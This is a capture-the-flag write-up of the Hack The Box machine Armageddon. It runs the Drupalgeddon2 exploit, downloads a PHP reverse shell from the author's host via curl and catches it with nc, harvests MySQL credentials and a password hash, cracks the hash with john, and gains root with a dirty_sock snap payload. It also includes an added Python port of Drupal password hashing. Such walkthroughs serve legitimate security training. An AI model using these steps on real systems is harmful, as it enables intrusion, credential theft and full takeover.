Armageddon
Armageddon is an easy box from Hack The Box.
Enumeration
Nmap returns just 2 ports, 22 and 80. The web server appears to be running Drupal 7. A more specific version number could be helpful.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
Checking out http://10.10.10.233/CHANGELOG.txt reveals that the server is running Drupal 7.56 as of its most recent update.
Exploitation
Checking for any publicly available exploits with searchsploit drupal 7.56:
Drupal 7.56 looks like it should be vulnerable to the Drupalgeddon2 exploit.
I can copy that script over with searchsploit -m php/webapps/44449.rb.
Run the script, which I’ve renamed for ease of use, and I have a low-priv shell as user apache:
ruby drupalgeddon2.rb 10.10.10.233
The shell does not have a lot of functionality, unfortunately. I can’t even change directories so I need to find a more persistent solution.
I have access to curl and am able to write to the web root, so I’ll upload the handy php-reverse-shell from pentestmonkey and use that instead.
First, I host my reverse shell on a web server of my own with sudo python -m SimpleHTTPServer 80.
Then curl http://10.10.14.22/rev.php -o rev.php in the drupalgeddon shell to pull it down and write it to the web root.
Finally, start a listener on my box with nc -lvnp 80 and call the reverse shell with curl 10.10.10.233/rev.php.
I had initially tried to get a listener on port 4444, but it did not work. There is probably a firewall rule limiting outgoing connections to 80 or 443, as those are the only 2 ports I was able to get a connection on.
That’s more like it. Now I can actually move around the file system.
Privilege Escalation
This new shell is admittedly not much better than the drupalgeddon one. The usual python shell upgrade tricks don’t work, so I’ll have to make do with what I’ve got.
Digging through web config files in /var/www/html/sites/default, there is a file settings.php that contains some interesting information.
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
MySQL creds!
Due to the nature of the shoddy shell I’m using, MySQL behavior is a little weird.
I try to connect to the DB with mysql -u drupaluser -p and enter the password when prompted, but I don’t get any response.
It took a while to put together, but MySQL is accepting the commands, it just won’t output the results until I send an exit command, at which point it returns the results of my queries all at once.
So, after some trial and error, and stumbling through in the dark, I manage to find a password hash in the users table of the drupal database.
use drupal;
select * from users;
exit
uid name pass mail theme signature signature_format created access login status timezone language picture init data
0 NULL 0 0 0 0 NULL 0 NULL
1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}
I copy the hash into a file and send that to john to see if he can crack it.
john bruce.txt --wordlist=/usr/share/wordlists/rockyou.txt
Looks like brucetherealadmin’s password is booboo.
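As an added example that is not part of the original writeup, here is a Python port of Drupal 7's password hashing that parses the hash recovered above, reports its cost and salt, and verifies a candidate password. It shows why the cost parameter (the hash's 4th character, giving log2 of the SHA-512 iteration count) only slows a wordlist attack down and cannot rescue a short dictionary password.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55
ALGOS = {"$S$": "sha512", "$P$": "md5", "$H$": "md5"}  # $P$/$H$: older phpass hashes
STORED_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"  # from the users table

def parse_drupal_hash(stored: str) -> dict:
    """Split a stored hash into algorithm, cost (log2 and absolute) and 8-char salt."""
    if len(stored) < 12 or stored[:3] not in ALGOS:
        raise ValueError("not a Drupal 7 password hash")
    cost_log2 = ITOA64.index(stored[3])
    if not 7 <= cost_log2 <= 30:  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
        raise ValueError("cost out of range")
    return {"algo": ALGOS[stored[:3]], "cost_log2": cost_log2,
            "iterations": 1 << cost_log2, "salt": stored[4:12]}

def _password_base64_encode(data: bytes) -> str:
    """Port of Drupal's _password_base64_encode(): 3 bytes -> 4 ITOA64 chars, low bits first."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def drupal_hash(password: str, setting: str) -> str:
    """Recompute a hash for `password` from the 12-char setting prefix of a stored hash."""
    info = parse_drupal_hash(setting)
    pw = password.encode()
    digest = hashlib.new(info["algo"], info["salt"].encode() + pw).digest()
    for _ in range(info["iterations"]):  # mirrors Drupal's do {...} while (--$count) loop
        digest = hashlib.new(info["algo"], digest + pw).digest()
    return (setting[:12] + _password_base64_encode(digest))[:DRUPAL_HASH_LENGTH]

def verify_drupal_password(password: str, stored: str) -> bool:
    """Constant-time check of a candidate password against a stored hash."""
    return hmac.compare_digest(drupal_hash(password, stored), stored)
```

Each candidate costs 2^15 SHA-512 calls, which is a few tens of milliseconds in pure Python; a rockyou-sized wordlist is still trivial for john on this hash.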
I use those creds to SSH in:
Time to see what my man bruce can get up to.
I run sudo -l to check his sudo permissions.
Bruce has the ability to install a snap package as the root user. It shouldn’t be too hard to leverage that into a root shell.
I found this one-liner which will create a user with root privileges.
python -c 'print("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" + "A" * 4256 + "==")' | base64 -d > payload.snap
With the snap package created, install it:
sudo /usr/bin/snap install payload.snap --dangerous --devmode
su dirty_sock to become the new user, then sudo -i to drop into a root shell.